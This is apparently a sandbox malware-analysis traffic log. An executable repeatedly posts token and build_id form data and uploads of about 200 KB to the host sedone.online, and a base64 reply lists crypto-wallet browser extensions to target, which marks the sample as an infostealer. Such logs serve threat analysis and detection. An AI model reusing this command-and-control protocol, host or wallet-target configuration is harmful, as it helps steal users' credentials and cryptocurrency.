                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 52 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 52 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 52 39 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------U3WL6P8YMYM7QI589R9ZContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------U3WL6P8YMYM7QI589R9ZContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------U3WL6P8YMYM7QI589R9ZCont
                                                                                                                                                                                                                                                2024-12-16 14:39:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:41 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49720 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:42 UTC | 325 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----9000ZCJ5XBIEU37YU3WT
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: sedone.online
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-16 14:39:42 UTC | 332 | OUT | Data Ascii:
    ------9000ZCJ5XBIEU37YU3WT
    Content-Disposition: form-data; name="token"

    2afa0bd343ad19f9200a181fa83489aa
    ------9000ZCJ5XBIEU37YU3WT
    Content-Disposition: form-data; name="build_id"

    e411cf62bcba04d74fc6b505b9235404
    ------9000ZCJ5XBIEU37YU3WT
    Cont
2024-12-16 14:39:43 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 16 Dec 2024 14:39:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-16 14:39:43 UTC | 119 | IN | Data Ascii:
    6c
    TWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49728 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:44 UTC | 326 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: sedone.online
    Content-Length: 6209
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-16 14:39:44 UTC | 6209 | OUT | Data Ascii:
    ------7QQIMOZMYUSRQI58G4WT
    Content-Disposition: form-data; name="token"

    2afa0bd343ad19f9200a181fa83489aa
    ------7QQIMOZMYUSRQI58G4WT
    Content-Disposition: form-data; name="build_id"

    e411cf62bcba04d74fc6b505b9235404
    ------7QQIMOZMYUSRQI58G4WT
    Cont
2024-12-16 14:39:46 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 16 Dec 2024 14:39:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-16 14:39:46 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49731 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:45 UTC | 325 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: sedone.online
    Content-Length: 489
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-16 14:39:45 UTC | 489 | OUT | Data Ascii:
    ------7QQIMOZMYUSRQI58G4WT
    Content-Disposition: form-data; name="token"

    2afa0bd343ad19f9200a181fa83489aa
    ------7QQIMOZMYUSRQI58G4WT
    Content-Disposition: form-data; name="build_id"

    e411cf62bcba04d74fc6b505b9235404
    ------7QQIMOZMYUSRQI58G4WT
    Cont
2024-12-16 14:39:46 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 16 Dec 2024 14:39:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-16 14:39:46 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49743 | 172.217.21.36 | 443 | 7704 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:49 UTC | 595 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
2024-12-16 14:39:50 UTC | 1266 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 14:39:50 GMT
    Pragma: no-cache
    Expires: -1
    Cache-Control: no-cache, must-revalidate
    Content-Type: text/javascript; charset=UTF-8
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-A01akOlsJuJLMtVpMHOofA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
    Accept-CH: Sec-CH-Prefers-Color-Scheme
    Accept-CH: Sec-CH-UA-Form-Factors
    Accept-CH: Sec-CH-UA-Platform
    Accept-CH: Sec-CH-UA-Platform-Version
    Accept-CH: Sec-CH-UA-Full-Version
    Accept-CH: Sec-CH-UA-Arch
    Accept-CH: Sec-CH-UA-Model
    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49748 | 172.217.21.36 | 443 | 7704 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:50 UTC | 498 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-12-16 14:39:51 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:50 GMT
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                10 | 192.168.2.7 | 49749 | 172.217.21.36 | 443 | 7704 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:50 GMT
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                11 | 192.168.2.7 | 49765 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-12-16 14:39:54 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MGDJMO8GV3WBIMG4EK6X
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 505
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:54 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 47 44 4a 4d 4f 38 47 56 33 57 42 49 4d 47 34 45 4b 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 44 4a 4d 4f 38 47 56 33 57 42 49 4d 47 34 45 4b 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 44 4a 4d 4f 38 47 56 33 57 42 49 4d 47 34 45 4b 36 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------MGDJMO8GV3WBIMG4EK6XContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------MGDJMO8GV3WBIMG4EK6XContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MGDJMO8GV3WBIMG4EK6XCont
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49770 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:55 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----SJMO89RQIEUAAASJ5PP8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 14:39:55 UTC | 16355 | OUT | Data Ascii: ------SJMO89RQIEUAAASJ5PP8Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------SJMO89RQIEUAAASJ5PP8Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------SJMO89RQIEUAAASJ5PP8Cont
2024-12-16 14:39:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:39:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49777 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:57 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 14:39:57 UTC | 16355 | OUT | Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------QQIEKNGVAAAAIE3O8Q16Cont
2024-12-16 14:39:58 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:39:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 14:39:58 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49783 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:39:59 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BS2D2V3W4EUAAIWBIWT2
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 142457
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------BS2D2V3W4EUAAIWBIWT2Cont
2024-12-16 14:40:01 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49785 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:00 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BS2D2V3W4EUAAIWBIWT2
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 493
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:00 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------BS2D2V3W4EUAAIWBIWT2Cont
2024-12-16 14:40:01 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
